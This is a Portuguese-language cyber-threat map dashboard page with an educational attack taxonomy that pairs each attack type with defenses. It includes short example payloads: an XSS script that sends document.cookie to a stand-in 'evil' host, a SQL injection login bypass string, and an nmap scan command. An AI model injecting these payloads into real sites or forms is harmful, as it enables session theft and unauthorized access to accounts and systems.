Painel de visualização de ameaças cibernéticas em tempo real. Inspirado em consoles de SOC (Kaspersky, FireEye, NorseCorp). Útil para entender o comportamento global da internet, treinar olho de analista e estudar vetores de ataque.
⚠ mapa: visualização ambiente com cidades reais · animações simuladas para fins educacionais. Os dados REAIS aparecem no painel abaixo.
// live_feed · dados reais
check-the-sum.frIPs maliciosos detectados por uma rede global de honeypots — capturados tentando ataques de força bruta, scanning, exploits e malware. Atualizado a cada hora.
ataques/dia (global)
~2.2 bi
tentativas detectadas em sensores globais
ransomware/ano
+317 mi
tentativas reportadas (Sophos 2024)
phishing/dia
~3.4 bi
emails maliciosos circulando diariamente
tempo médio detecção
204 dias
MTTD em breaches (IBM X-Force)
fontes / sources: ENISA · Verizon DBIR · IBM X-Force · Sophos State of Ransomware (2023-24)
// attack_taxonomy
Os tipos exibidos no mapa correspondem aos vetores mais comuns observados em relatórios de threat intel. Estude cada um para reconhecê-los na prática.
Distributed Denial of Service — sobrecarrega o alvo com tráfego massivo, derrubando serviços.
→ exemplo: Botnet Mirai usando milhões de câmeras IoT contra DNS provider.
↳ defesa: CDN com anti-DDoS, rate limiting, scrubbing center upstream.
Malware que criptografa arquivos e exige resgate em cripto. Hoje quase sempre vem com double extortion (vaza dados também).
→ exemplo: LockBit, BlackCat, Conti — paralisam hospitais, bancos e prefeituras.
↳ defesa: Backup offline 3-2-1, EDR, MFA em RDP/VPN, segmentação de rede.
Engenharia social via email/SMS/voz para roubar credenciais ou entregar payload. Vetor #1 de breaches.
→ exemplo: Fake Microsoft 365 login → AiTM proxy captura cookie de sessão.
↳ defesa: Treinamento contínuo, DMARC/SPF/DKIM, FIDO2/passkeys, sandboxing de anexos.
Tentativa exaustiva de senhas — credential stuffing usa vazamentos prévios; password spraying tenta uma senha comum em muitos usuários.
→ exemplo: Bot tentando 'P@ssw0rd123' em 50k contas diferentes.
↳ defesa: MFA obrigatório, rate limiting por IP/usuário, lockout, monitoramento de leak.
Injeção de SQL malicioso em parâmetros web — permite ler/alterar/deletar todo o banco. Clássico do OWASP Top 10.
→ exemplo: ' OR 1=1-- em campo de login para bypass de auth.
↳ defesa: Prepared statements / ORM, input validation, WAF, princípio do menor privilégio no DB.
Malware genérico — trojans, infostealers (RedLine, Raccoon), RATs, cryptominers. Geralmente entra via phishing ou software pirata.
→ exemplo: Infostealer roubando cookies do Chrome e enviando pra C2.
↳ defesa: EDR/XDR, application allow-listing, hardening de browser, hunting de C2.
Cross-Site Scripting — injeta JS em páginas legítimas, roubando sessões e fazendo ações em nome da vítima.
→ exemplo: <script>fetch('//evil/'+document.cookie)</script> em comentário de blog.
↳ defesa: Output encoding, CSP estrita, HttpOnly + SameSite cookies, sanitização (DOMPurify).
Remote Code Execution — atacante roda código arbitrário no servidor. O santo graal dos exploits.
→ exemplo: Log4Shell (CVE-2021-44228), Spring4Shell, ProxyLogon no Exchange.
↳ defesa: Patching agressivo, WAF com virtual patching, segmentação, runtime protection.
Fase de reconhecimento — port scan, subdomain enum, OSINT, fingerprinting. Não é um ataque em si, mas precede 100% deles.
→ exemplo: nmap -sV no range público, Shodan dorks, certificate transparency logs.
↳ defesa: Reduzir attack surface, EASM, honeypots, deception, NIDS para detectar scans.
// top_origins
// top_targets